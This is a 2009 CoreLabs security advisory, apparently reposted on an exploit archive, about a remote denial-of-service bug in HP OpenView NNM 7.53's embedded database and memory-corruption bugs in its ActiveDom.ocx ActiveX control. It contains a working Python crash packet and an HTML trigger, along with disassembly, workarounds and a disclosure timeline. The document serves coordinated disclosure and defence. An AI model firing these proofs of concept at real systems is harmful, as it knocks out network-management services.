Skip to content
cyberexploits
doswindowstext

HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code

HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code

Published on 2009-11-17

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/dos/10176.txt7eac4c3a
raw
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



      Core Security Technologies - CoreLabs Advisory

           http://www.coresecurity.com/corelabs/



  HP Openview NNM 7.53 Invalid DB Error Code vulnerability







1. *Advisory Information*



Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability

Advisory Id: CORE-2009-0814

Advisory URL:

http://www.coresecurity.com/content/openview_nnm_internaldb_dos

Date published: 2009-11-17

Date of last update: 2009-11-17

Vendors contacted: HP

Release mode: Coordinated release





2. *Vulnerability Information*



Class: External Initialization of Trusted Variables [CWE-454]

Impact: Denial of Service

Remotely Exploitable: Yes

Locally Exploitable: No

Bugtraq ID: N/A

CVE Name: CVE-2009-3840





3. *Vulnerability Description*



HP Openview Network Node Manager is one of the most widely-deployed

network monitoring and management platforms used throughout enterprise

organizations today. The platform includes many server and client-side

core components with a long list of previously disclosed security bugs.

In this case, a remotely exploitable vulnerability was found in the

database server core component used by NNM. Exploitation of the bug does

not require authentication and will lead to a remotely triggered denial

of service of the internal database service.





4. *Vulnerable packages*



   . HP Openview NNM 7.53



Other versions may be vulnerable but were not tested. Refer to the

vendor's security bulletin for a full list.





5. *Non-vulnerable packages*



Refer to the vendor's security bulletin.





6. *Vendor Information, Solutions and Workarounds*



The vendor issued security bulletin HPSBMA02477 SSRT090177 to address

the problem and provide fixes. It is available at

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980



The database service of HP Openview Network Node Manager is remotely

accessible on port 2690/tcp. Restricting or blocking access to that port

will prevent exploitation but may prevent normal operation of Openview NNM.





7. *Credits*



This vulnerability was discovered and researched by Damian Frizza from

Core Security Technologies.





8. *Technical Description / Proof of Concept Code*





8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*



HP Openview Network Node Manager includes an embedded database engine

service that is enabled by default and accepts remote connections on

port 2690/tcp. The service is implemented by the 'ovdbrun.exe' which is

started automatically on boot. For certain transactions upon receiving a

packet from the network the service will attempt to determine and

display an error code string based on an error code number specified in

the packet. By sending a specifically crafted packet with an invalid

error code number it is possible to remotely trigger an exception that

forces abnormal termination of the service. It is unlikely that the bug

could be exploited for anything other than a remote denial of service.



The following code excerpt explains the problem:



/-----

005FED51   MOVZX EDX,BYTE PTR SS:[ESP+2]     #FCFF

005FED56   MOVSX ECX,WORD PTR SS:[ESP+3]

005FED5B   CMP ECX,-1

005FED5E   MOVSX EAX,WORD PTR SS:[ESP+5]     #FCFF

005FED63   MOV DWORD PTR DS:[ESI+10],EDX

005FED66   MOV EDX,DWORD PTR SS:[ESP+7]

005FED6A   MOV DWORD PTR DS:[ESI+14],ECX

005FED6D   MOV DWORD PTR DS:[ESI+18],EAX

005FED70   MOV DWORD PTR DS:[ESI+C],EDX

005FED73   JGE SHORT ovdbrun.005FED7E

005FED75   CMP EAX,-1

005FED78   JGE SHORT ovdbrun.005FED7E

005FED7A   CMP ECX,EAX

005FED7C   JE SHORT ovdbrun.005FED83

005FED7E   MOV EAX,1

005FED83   ADD ESP,0C

005FED86   RETN



- -----/



The code above checks for an error condition based on the value of an

Error Code field in the inbound network packet. An error condition is

explicitly handled if the Error Code value is less or equal than -1 in

which case a MessageBox with a corresponding descriptive error string

will be presented to the user. However by crafting a packet with any

negative value in the Error Code field different that -1 the lookup for

the corresponding error string will fail triggering a non-recoverable

error and thus terminating the server process.



The following python code can be used to reproduce the bug:



/-----

#!python

import socket

import struct



a =  struct.pack('<b', 2)

a += struct.pack('<H', 0)

a += struct.pack('<H',0xFEFF)

a += struct.pack('<H',0xFEFF)

a += "1234"



target_ip = 'X.X.X.X'



s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

s.connect ((target_ip, 2690))



s.send(a)

s.close()



- -----/







8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX*



The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53

and installed by default. The control is prone to multiple memory

corruption bugs due to erroneous handling of overly long strings passed

to multiple methods. These bugs are considered of low severity because

the control is not configured as Safe for Scripting or Safe for

Initialization [1] and therefore cannot be exploited without explicit

user consent. Since the control was reported by the vendor as not used

nor required by any component of OpenView NNM, finding deployed systems

with security configuration settings changed to allow exploitation of

these bugs is very unlikely. Nonetheless information about them is

included below for the purpose of completeness in the documentation of

this advisory.



Some of the ActiveX control's methods with implementation flaws are:



/-----

DisplayName(str)

AddGroup(str)

InstallComponent(str)

Subscribe(str, str, int)



- -----/



The following excerpt from method DisplayName() demonstrates the problem:



/-----

2000D408   MOV DWORD PTR SS:[EBP-4],-1

2000D40F   JMP SHORT ACTIVE~1.2000D3D6

2000D411   MOV EAX,ACTIVE~1.200361A0

2000D416   JMP <JMP.&MSVCRT.__CxxFrameHandler>

2000D41B   MOV EAX,ACTIVE~1.2000D4A8

2000D420   CALL <JMP.&MSVCRT._EH_prolog>

2000D425   SUB ESP,10

2000D428   PUSH EBX

2000D429   PUSH ESI

2000D42A   PUSH EDI

2000D42B   MOV DWORD PTR SS:[EBP-10],ESP

2000D42E   MOV DWORD PTR SS:[EBP-14],ECX

2000D431   XOR EBX,EBX

2000D433   MOV DWORD PTR SS:[EBP-4],EBX

2000D436   LEA ESI,DWORD PTR DS:[ECX+28]

2000D439   MOV ECX,DWORD PTR DS:[ESI]        ; ESI = 00038178

2000D43B   MOV EAX,DWORD PTR DS:[ECX]        ;

2000D43D   CALL DWORD PTR DS:[EAX+48]        ;



- -----/



The following HTML code can be used to trigger the bug:



/-----

<html>

<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target'



    </object>



<script>

a = ""

for (i = 0; i < 10000; i++)

   a = a + "A"

target.DisplayName(a)

</script>

</html>





- -----/







9. *Report Timeline*



. 2009-08-12:

Core Security Technologies notifies the HP Software Security Response

Team (SSRT) of the vulnerability and preliminary schedule to publish the

corresponding security advisory on September 8th 2009. Core asks for

acknowledgement of the email within 2 working days and whether HP SSRT

prefers to receive the technical description of the bug encrypted or in

plaintext.



. 2009-08-12:

HP SSRT asks Core to send the technical description of the vulnerability

encrypted using the PGP key with id 0x08B83D45.



. 2009-08-14:

Core Security Technologies sends technical details encrypted to HP SSRT.



. 2009-08-18:

HP SSRT informs Core that HP engineering have been notified and will

notify Core when they have a schedule estimate. SSRT assigned the IDs

SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.



. 2009-08-27:

Core requests a status update from HP SSRT.



. 2009-08-27:

HP SSRT informs Core that the vulnerabilities are in third-party code

and that the third-party vendor has been notified but there isn't a

schedule for fixes yet. HP SSRT indicates that it is sure HP will not

have a solution ready by September 7th.



. 2009-08-27:

Core informs the HP team that the publication was re-scheduled to

September 21st and requests an update to continue coordinating the

release of fixes and publication of the advisory as soon as possible.



. 2009-08-28:

The HP team informs Core that the third party if planning a release on

October 30th for the first vulnerability. SSRT also notes that ActiveX

vulnerabilities are still being investigated.



. 2009-08-31:

Core Security Technologies acknowledges the information sent by HP SSRT.



. 2009-09-01:

The HP team communicates that they will inform Core Security

Technologies when the fix is available.



. 2009-09-04:

Core asks the HP SSRT to map HP's internal IDs to each of the reported

vulnerability.



. 2009-09-04:

The HP SSRT indicates that SSRT090177 corresponds to the embedded

database vulnerability and SSRT090178 to the ActiveX bugs.



. 2009-09-10:

Core Security Technologies notifies HP SSRT that publication of the

advisory has been re-scheduled to October 30th to be able to coordinate

the release with the issuance of fixes by the third party vendor and

that if non-third-party vulnerabilities (the ActiveX bugs) could be

fixed earlier they would be described in a separate advisory.



. 2009-09-11:

HP SSRT says that it will send any new information to Core on the

ActiveX bugs if they have something to publish before October 30th.



. 2009-09-21:

The HP team informs Core that they are having some problems reproducing

the ActiveX vulnerabilities reported. The NNM engineers have used the

provided proof-of-concept exploit but did not see any effect. SSRT asks

if an overflow was confirmed, if process failure was detected and if a

debugger or a different procedure was used.



. 2009-09-21:

Core Security Technologies notifies the HP SSRT that the proof of

concept crash can be observed using a classic debugger or a just-in-time

debugger that is attached only after an abnormal exception is detected.

Core also sends HP SSRT another proof of concept HTML code that crashes

the ActiveX and can be observed without the need of a debugger.



. 2009-09-22:

The HP team acknowledges previous email from Core with the new PoC to

reproduce the crashes without a debugger.



. 2009-10-06:

Core requests a status update from the SSRT noting that it hasn't

received any update since September 22nd. The advisory is still

scheduled for publication on October 30th and Core is waiting for

confirmation that the ActiveX bugs were reproduced and the fix for them

could be published earlier separately.



. 2009-10-09:

SSRT updates indicating that fixes from the third party for SSRT090177

have been received and HP is currently in the process of testing them on

all platforms expecting an update by October 16th. The ActiveX bugs have

been reproduced and HP determined that the vulnerable control is not

necessary for NNM. HP will recommend customers to set the kill bit for

the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as workaround.



. 2009-10-19:

Core requests a status update and confirmation that HP will be ready to

release fixes by October 30th. Core asks if fixes will be issued for all

vulnerable versions of NNM, whether the fixes or patches will remove the

unnecessary ActiveX control or just ask customers to implement the

workaround. Core requests the complete lists of vulnerable versions and

platforms of NNM and asks if the patches will include fixes to other

bugs. Also, Core notes that the vendor of the third party component has

been identified and that since the bug may affect other products Core

will start a separate vulnerability report process directly with that

vendor.



. 2009-11-02:

Email from Core asking for a status update and an acknowledgement and

response to the questions from the previous email. Core notes that the

previously agreed publication date for the advisory has already passed

without any update from HP. The publication date has been unilaterally

moved to Wednesday November 4th. 2009 and is considered final pending a

response from HP.



. 2009-11-03:

Response from HP SSRT stating that there is not an estimated release

date for patches to some platforms. With regards to the ActiveX bugs, a

security bulletin will be published on November 9th recommending setting

the kill bit.



. 2009-11-03:

Core indicates that since there isn't an estimated patch release date

for missing platforms the advisory will be published on November 9th and

will include guidance on how to implement workarounds for both problems.

Core asks SSRT about the potential impact of blocking or restricting

access to the vulnerable service as a workaround.



. 2009-11-05:

SSRT suggests that given that Core advisory will be published earlier

than HP's security bulletin it should have workarounds for all platforms

and not just for the ones that may not have a patch available

afterwards. HP is still investigating the impact of blocking or

restricting access to the vulnerable port. SSRT asks if Core wants any

acknowledgement in its security bulletin



. 2009-11-05:

Core asks what is the planned publication date for HP's bulletin and

requests that the bulletin credits the discoverer (Damian Frizza).

Provided that the estimated date for publishing the bulletin is not

unreasonable Core would rather schedule the publication of the advisory

to match HP's.



. 2009-11-06:

SSRT informs that their estimate is to have hotfixes available

internally by November 13th and released along with the corresponding

security bulletins by November 17th. SSRT ask whether CVE numbers should

be assigned by HP or provided by Core.



. 2009-11-06:

Core re-schedules publication to November 17th. Core asks SSRT to assign

the CVE numbers.



. 2009-11-12:

HP SSRT reports that the ActiveX control is not marked as safe for

scripting or safe for initialization by default and thus the buffer

overflows in its methods do not seem to be security issues. Asks if Core

still considers them security vulnerabilities.



. 2009-11-16:

HP SSRT provides the CVE id assigned to the denial of service bug.

Indicates that the vendor's security bulletin will not suggest any

workarounds as the effect of blocking or restricting access to the

vulnerable service has not been determined.



. 2009-11-16:

Core confirms that the ActiveX control is not marked as safe for

scripting or initialization which greatly diminishes the relevance of

the reported bugs. Nonetheless, the information about the bugs will be

included in the advisory for the purpose of completeness and to let

users verify, and if necessary correct, the control's configuration

settings. Core still recommends the vendor to remove the unnecessary

control from installation packages and fix the reported bugs to avoid

potential introduction of flaws if it becomes a used control in the

future or should an alternative exploitation vector be found.



. 2009-11-17:

Publication of HP Security Bulletin SSRT090177.



. 2009-11-17:

Advisory CORE-2009-0814 published.







10. *References*



[1] Safe Initialization and Scripting for ActiveX Controls.

http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx

[2] How to stop an ActiveX control from running in Internet Explorer.

http://support.microsoft.com/kb/240797





11. *About CoreLabs*



CoreLabs, the research center of Core Security Technologies, is charged

with anticipating the future needs and requirements for information

security technologies. We conduct our research in several important

areas of computer security including system vulnerabilities, cyber

attack planning and simulation, source code auditing, and cryptography.

Our results include problem formalization, identification of

vulnerabilities, novel solutions and prototypes for new technologies.

CoreLabs regularly publishes security advisories, technical papers,

project information and shared software tools for public use at:

http://www.coresecurity.com/corelabs.





12. *About Core Security Technologies*



Core Security Technologies develops strategic solutions that help

security-conscious organizations worldwide develop and maintain a

proactive process for securing their networks. The company's flagship

product, CORE IMPACT, is the most comprehensive product for performing

enterprise security assurance testing. CORE IMPACT evaluates network,

endpoint and end-user vulnerabilities and identifies what resources are

exposed. It enables organizations to determine if current security

investments are detecting and preventing attacks. Core Security

Technologies augments its leading technology solution with world-class

security consulting services, including penetration testing and software

security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core

Security Technologies can be reached at 617-399-6980 or on the Web at

http://www.coresecurity.com.





13. *Disclaimer*



The contents of this advisory are copyright (c) 2009 Core Security

Technologies and (c) 2009 CoreLabs, and may be distributed freely

provided that no fee is charged for this distribution and proper credit

is given.





14. *PGP/GPG Keys*



This advisory has been signed with the GPG key of Core Security

Technologies advisories team, which is available for download at

http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.8 (MingW32)

Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/



iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat

YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF

=cR49

-----END PGP SIGNATURE-----



View on GitHub